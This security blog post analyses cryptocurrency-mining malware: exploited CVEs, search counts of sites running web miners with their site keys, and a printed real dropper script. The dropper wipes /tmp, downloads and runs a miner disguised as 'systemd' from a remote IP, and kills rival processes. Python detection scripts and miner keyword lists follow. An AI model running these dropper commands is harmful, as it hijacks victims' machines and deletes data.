The Rise of Cryptocurrency Mining Malware

1. The evolution of crypto mining malware

Cryptocurrency mining attacks are increasing exponentially. Cyber criminals have increasingly turned to cryptomining malware as a way to harness the processing power of large numbers of computers and servers to generate revenue. According to the McAfee Labs Threats Report: June 2018, more than 2.9 million samples of coin-miner malware were seen in the first quarter of 2018, and the total count of coin-miner malware rose by 629%.

A. 2017: Cryptocurrency-mining malware is threatening WordPress websites:

Cyber criminals have exploited the RevSlider vulnerability to perform remote command injection attacks, creating a botnet of web servers that mines

** https://blog.sucuri.net/2017/09/hacked-websites-mine-crypocurrencies.html

B. October 2017: Cryptocurrency-mining malware is threatening Windows using Mimikatz and the EternalBlue vulnerability (CVE-2017-0144):

Fileless Monero WannaMine is a new attack discovered by PandaLabs at the end of October 2017. This malware uses the Mimikatz utility and the EternalBlue exploit for lateral movement. To maintain persistence on the infected system, it uses Windows Management Instrumentation and scheduled PowerShell commands. After breaking in, the WannaMine worm uses the infected computer's CPU to quietly mine cryptocurrency in the background.

** https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/

C. February 2018: Cryptocurrency-mining malware is threatening WebLogic:

According to FireEye, CVE-2017-10271 was used to deliver cryptominers. CVE-2017-10271 is a known input validation vulnerability in the WebLogic Server Security Service of Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. The attackers used PowerShell to download the miner directly onto the victim's system.

** https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html

D. February 2018: Cryptocurrency-mining malware is threatening Jenkins:

The Check Point research team has discovered what could potentially become one of the biggest malicious mining operations ever seen. The crypto-miner malware exploits the known CVE-2017-1000353 vulnerability in the Jenkins Java deserialization implementation.

** https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/

E. April 2018: Cryptocurrency-mining malware is threatening Drupal:

The SANS Internet Storm Center has spotted attempts to deliver a cryptocurrency miner, a simple PHP backdoor that allows attackers to upload more files to the targeted server, and an IRC bot written in Perl. In the attack, the hackers used CVE-2018-7600 (the Drupalgeddon2 attacks).

** https://www.securityweek.com/drupal-sites-targeted-backdoors-miners-drupalgeddon2-attacks

F. August 2018: Cryptocurrency-mining malware is threatening MikroTik routers:

Security researchers have discovered at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers vulnerable to CVE-2018-14847 to secretly install cryptocurrency miners on computers connected to them. The malware campaigns have compromised more than 210,000 routers.

** https://thehackernews.com/2018/08/mikrotik-router-hacking.html

2. Detection of crypto mining malware

A. Coinhive

  • Shodan: the number of devices using the Coinhive JavaScript library (coinhive.min.js) is 91,840
https://www.shodan.io/search?query=html%3A%22coinhive.min.js%22&page=1
  • publicwww.com: the number of devices using the Coinhive JavaScript library (coinhive.min.js) is 15004 (6295 WordPress websites)
https://publicwww.com/websites/%22coinhive.min.js%22/
https://publicwww.com/websites/+%22coinhive.min.js%22+wordpress/
  • Censys.io: the number of devices using the Coinhive JavaScript library (coinhive.min.js) is 51957
https://censys.io/ipv4?q=%22coinhive.min.js%22
  • Zoomeye.org: the number of devices using the Coinhive JavaScript library (coinhive.min.js) is 13051.
https://www.zoomeye.org/searchResult?q=%22coinhive.min.js%22

The distribution of Coinhive wallets:

  1. Wallet: hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3
76,589: https://www.shodan.io/search?query=html%3AhsFAjjijTyibpVjCmfJzlfWH3hFqWVT3
26,250: https://censys.io/ipv4?q=hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3

  2. Wallet: oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4
12718: https://www.shodan.io/search?query=html%3AoDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4
15487: https://censys.io/ipv4?q=oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4

  3. Obfuscated wallet: EbaacwdfTFnKczJdcK8KJyOQy1toE1Z9

To deobfuscate this code, I used this website: https://codebeautify.org/octal-hex-converter

https://censys.io/ipv4?q=_0x4020

  4. Other wallets:


B. Crypto-Loot

Crypto-Loot is the most popular alternative to Coinhive; it doesn't require any user interaction and can run stealthily in the background.

  • Publicwww.com: the number of devices using the Crypto-Loot JavaScript library is 395
https://publicwww.com/websites/%22crypto-loot.com%22/
https://publicwww.com/websites/%22cryptoloot.pro%22/
  • Shodan: the number of devices using the Crypto-Loot JavaScript library is 14
https://www.shodan.io/search?query=html%3ACryptoLoot.Anonymous
  • Zoomeye.org: the number of devices using the Crypto-Loot JavaScript library is 21
https://www.zoomeye.org/searchResult?q=%22CryptoLoot.Anonymous%22
  • Censys.io: the number of devices using the Crypto-Loot JavaScript library is 13
https://censys.io/ipv4?q=%22miner%3Dnew+CryptoLoot.Anonymous%22

Examples of Crypto-Loot wallets:

C. WebMinePool

The WebMinePool JavaScript miner can be embedded directly into a website or application. The miner itself does not come with a user interface.

https://webminepool.com/page/js-miner
  • Zoomeye.org: the number of devices using the WebMinePool JavaScript library (webminepool.com/lib/base.js) is 680.
https://www.zoomeye.org/searchResult?q=%22WMP.Anonymous%22
  • Shodan.io: the number of devices using the WebMinePool JavaScript library (webminepool.com/lib/base.js) is 14003.
https://www.shodan.io/search?query=html%3AWMP.Anonymous
  • Censys.io: the number of devices using the WebMinePool JavaScript library (webminepool.com/lib/base.js) is 31554.
https://censys.io/ipv4?q=%22WMP.Anonymous%22
  • Publicwww.com: the number of devices using the WebMinePool JavaScript library (webminepool.com/lib/base.js) is 79.
https://publicwww.com/websites/%22WMP.Anonymous%22

The distribution of WebMinePool wallets:


D. DeepMiner

E. CoinImp

  • New effective JavaScript miner
  • Free JavaScript Mining
  • Use Monero JavaScript web miner and earn money
https://www.coinimp.com/documentation
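The search-engine counts above all key on the same page markers: the miner library (coinhive.min.js, the crypto-loot.com / cryptoloot.pro hosts, webminepool.com/lib/base.js) and the CoinHive.Anonymous / CryptoLoot.Anonymous / WMP.Anonymous constructor that receives the site key. As an added example that is not part of the original post, this Python scanner applies those markers to page HTML you have fetched yourself and undoes the hex/octal string escapes used to hide a key; the sample pages are constructed, and the key is the first Coinhive wallet listed above.

```python
import re
from html import unescape

# Each miner: a regex for the library file/host the searches above look for, and one
# for the constructor call whose first argument is the site key ("wallet").
MINER_SIGNATURES = {
    "Coinhive": (r"coinhive\.min\.js",
                 r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9_-]{20,})['\"]"),
    "Crypto-Loot": (r"crypto-loot\.com|cryptoloot\.pro",
                    r"CryptoLoot\.Anonymous\(\s*['\"]([A-Za-z0-9_-]{20,})['\"]"),
    "WebMinePool": (r"webminepool\.com/lib/base\.js",
                    r"WMP\.Anonymous\(\s*['\"](SK_[A-Za-z0-9_-]+)['\"]"),
}

def decode_js_escapes(text):
    """Resolve \\xHH and \\OOO JavaScript string escapes, the octal/hex hiding of
    a site key that the post decodes with an online converter."""
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), text)

def scan_html(html):
    """Return {miner_name: site_key_or_None} for every miner library found in a page."""
    body = decode_js_escapes(unescape(html))
    hits = {}
    for name, (lib_re, key_re) in MINER_SIGNATURES.items():
        if re.search(lib_re, body, re.IGNORECASE):
            match = re.search(key_re, body)
            hits[name] = match.group(1) if match else None
    return hits

def js_hex_escape(s):
    """Constructed helper: hide a string behind \\xHH escapes, as an obfuscator would."""
    return "".join("\\x%02x" % ord(c) for c in s)

# Constructed sample pages (not captured from any real site); the key is the
# Coinhive site key quoted in the post.
KEY = "hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3"
SAMPLE_PLAIN = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
                '<script>var miner = new CoinHive.Anonymous("' + KEY + '"); miner.start();</script>')
SAMPLE_OBFUSCATED = ("<script>document.write('<script src=\"https://coinhive.com/lib/"
                     + js_hex_escape("coinhive.min.js") + "\"><\\/script>');"
                     "var m = new CoinHive.Anonymous('" + js_hex_escape(KEY) + "'); m.start();</script>")
SAMPLE_CLEAN = "<html><body><p>No miner here.</p></body></html>"

if __name__ == "__main__":
    for label, page in [("plain", SAMPLE_PLAIN), ("obfuscated", SAMPLE_OBFUSCATED), ("clean", SAMPLE_CLEAN)]:
        print(label, scan_html(page))
```

A hit with a key of None means the library is loaded but the constructor call was not a literal string (for instance the _0x4020 array-indexing style), so the decoded body still has to be read by hand.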

3. Example of a technique used by crypto mining malware

Yesterday, I found this script:

The code starts by removing everything under /var/tmp/ and /tmp/, which means it is probably wiping previously installed malware.

#!/bin/sh
rm -rf /var/tmp/*
rm -rf /tmp/*

After this, it downloads files and kills all running miner processes. The code attempts to download the configuration file (config.json) and store it as /tmp/c.json, and the malware binary (x), which it stores as /tmp/systemd:

( wget -qO - http://145.249.104.241/config.json > /tmp/c.json ) || (curl http://145.249.104.241/config.json > /tmp/c.json )
( wget -qO - http://145.249.104.241/x > /tmp/systemd ) || (curl http://145.249.104.241/x > /tmp/systemd)
chmod +x /tmp/systemd
ps auxf|grep -v grep|grep -v mwyumwdbpq|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "fyvxsztqix"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xm111"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "muhsti"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "donate"|awk '{print $2}'|xargs kill -9

The next step is to run the malware with the -c option (for the configuration file):

cd /tmp
./systemd -c c.json > /dev/null 2>&1 &
mv /tmp/systemd /dev/shm/x
chmod +x /dev/shm/x
mv c.json /dev/shm/c.json
/dev/shm/x -c /dev/shm/c.json > /dev/null 2>&1 &

Here is the configuration file (config.json):

Now, I will try to upload this script into VMware to test it. I use CVE-2018-7600 (the Drupalgeddon2 attack).

Now I download and run this script to start mining.
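The dropper above leaves a recognisable footprint on the host: a binary run from /tmp or /dev/shm (or from "./" after cd /tmp), named after a real daemon (systemd), started with "-c <config>.json", and a kill list of miner keywords (stratum, cryptonight, donate) that doubles as a detection wordlist. As an added example that is not part of the original post, this Python triage script applies those heuristics to "ps auxf" output; the process listing is constructed.

```python
import re

# Directories the dropper analysed above writes its binary to.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Fragments the dropper greps for when killing rival miners, plus the mining-pool
# protocol name; any of them in a command line is a strong miner indicator.
MINER_KEYWORDS = ("stratum", "cryptonight", "xmrig", "xm111", "donate")
# Daemon names a dropped binary may borrow (the script above calls itself "systemd").
SYSTEM_NAMES = {"systemd", "sshd", "kthreadd", "cron", "httpd"}

def classify_cmdline(cmdline):
    """Return the reasons a command line looks like a dropped miner ([] = clean)."""
    # 'ps auxf' prefixes child processes with tree characters such as " \_ ".
    argv = cmdline.strip().lstrip("\\_| ").split()
    if not argv or argv[0].rsplit("/", 1)[-1] == "grep":   # cf. the script's 'grep -v grep'
        return []
    exe, base, flat = argv[0], argv[0].rsplit("/", 1)[-1], " ".join(argv)
    reasons = []
    if exe.startswith(WRITABLE_DIRS) or exe.startswith("./"):
        reasons.append("runs from a world-writable or relative path: " + exe)
        if base in SYSTEM_NAMES:
            reasons.append("masquerades as system daemon: " + base)
        if re.search(r"(^|\s)-c\s+\S+\.json(\s|$)", flat):
            reasons.append("miner-style '-c <config>.json' option")
    reasons += ["miner keyword: " + kw for kw in MINER_KEYWORDS if kw in flat.lower()]
    return reasons

def triage_ps_output(ps_output):
    """Parse 'ps auxf' text (header first, command in column 11) and return
    {pid: reasons} for every process with at least one reason."""
    flagged = {}
    for line in ps_output.strip().splitlines()[1:]:
        fields = line.split(None, 10)
        reasons = classify_cmdline(fields[10]) if len(fields) == 11 else []
        if reasons:
            flagged[int(fields[1])] = reasons
    return flagged

# Constructed sample: what 'ps auxf' could show after the dropper above has run.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root       812  0.0  0.2  80000 12000 ?        Ss   10:01   0:00 /usr/lib/systemd/systemd --user
www-data  2231 98.7  1.5 410000 60000 ?        Sl   10:12  45:10  \\_ ./systemd -c c.json
www-data  2290 99.1  1.5 410000 60000 ?        Sl   10:13  44:58 /dev/shm/x -c /dev/shm/c.json
user      3001  0.0  0.0  20000  3000 pts/0    S+   10:20   0:00 grep stratum
"""

if __name__ == "__main__":
    for pid, reasons in triage_ps_output(SAMPLE_PS).items():
        print(pid, reasons)
```

The legitimate /usr/lib/systemd/systemd process is not flagged because the name check only applies to binaries outside system paths; pairing this with a high %CPU column is a cheap way to shortlist hosts for a closer look.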

Conclusion

1. Easy ways to block cryptocurrency mining in the web browser

2. EternalBlue

  • Patch your Windows systems and implement best practices.
  • Disable the SMBv1 protocol.

3. Upgrade MikroTik routers.

4. Update Drupal CMS, WordPress CMS, Jenkins and WebLogic.